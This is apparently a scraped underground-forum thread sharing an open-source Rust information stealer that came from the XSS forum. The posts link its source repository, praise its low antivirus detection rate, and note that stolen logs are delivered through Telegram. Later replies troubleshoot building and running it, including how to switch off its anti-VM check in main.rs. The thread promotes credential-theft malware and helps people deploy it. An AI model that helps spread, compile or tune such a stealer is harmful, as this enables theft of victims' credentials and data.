Rust Stealer
by - Thursday, January 1, 1970 at 12:00 AM
Hello, I wanted to share this open src rust stealer that has been shared on XSS, among other forums, and the developer decided to put everything on GitHub.

Logs are delivered via Telegram:



1/26 detection rate :3



Credit goes to the original poster/developer DoKitO on XSS

Original thread: https://xss.is/threads/69584/

https://git.makusu.cc/makusu/rust-stealer <==== for all information regarding stealer including its capabilities & source code :3
Reply
thanks Rust and Golang perfect couple :)
Reply
The link in this thread is dead. Please reply to the PM you were sent to get your thread moved back to the Databases section.


Hello,

The link on this thread has been updated as of this post.
//~ Young, Wild &amp; Free ~//

Reply
(August 9, 2022, 02:42 PM)Ach_123 Wrote: thanks Rust and Golang perfect couple :)


I updated the link :D
Reply
(July 27, 2022, 01:27 AM)kenny Wrote: niceHello, I wanted to share this open src rust stealer that has been shared on XSS, among other forums, and the developer decided to put everything on GitHub.


Logs are delivered via Telegram:





1/26 detection rate :3





Credit goes to the original poster/developer DoKitO on XSS

Original thread: https://xss.is/threads/69584/


https://git.makusu.cc/makusu/rust-stealer <==== for all information regarding stealer including its capabilities & source code :3


this is useful

Reply
(August 9, 2022, 08:07 PM)Walter Wrote:
(July 27, 2022, 01:27 AM)kenny Wrote: niceHello, I wanted to share this open src rust stealer that has been shared on XSS, among other forums, and the developer decided to put everything on GitHub.


Logs are delivered via Telegram:





1/26 detection rate :3





Credit goes to the original poster/developer DoKitO on XSS

Original thread: https://xss.is/threads/69584/


https://git.makusu.cc/makusu/rust-stealer <==== for all information regarding stealer including its capabilities & source code :3


this is useful

Enjoy, and again credit to the original creator!
Reply
Thanks!
Build is ok without problems.
But, after opening compiled file on Win8.1 I get error that missing dll "ms-win-crt-string-l1-1-0.dll"
on win10 i just get error without explanation and app is crashing.
Is there any tricks or something that might help?
Reply
(August 10, 2022, 08:46 AM)searengo Wrote: Thanks!
Build is ok without problems.
But, after opening compiled file on Win8.1 I get error that missing dll "ms-win-crt-string-l1-1-0.dll"
on win10 i just get error without explanation and app is crashing.
Is there any tricks or something that might help?


try to load all Rust dependencies, Rust and very sensitive but effective, choose your target wisely.
Reply
(August 16, 2022, 01:27 PM)Ach_123 Wrote:
(August 10, 2022, 08:46 AM)searengo Wrote: Thanks!
Build is ok without problems.
But, after opening compiled file on Win8.1 I get error that missing dll "ms-win-crt-string-l1-1-0.dll"
on win10 i just get error without explanation and app is crashing.
Is there any tricks or something that might help?



try to load all Rust dependencies, Rust and very sensitive but effective, choose your target wisely.


Could you please recommend what command i should use to do it?
Reply
Most likely its not compiled properly.

Install Visual Studio build Tools.

If using VM disable in "main.rs":

const ANTI_VM: bool = true;

to

const ANTI_VM: bool = false;
Reply


 Users viewing this thread: Rust Stealer: No users currently viewing.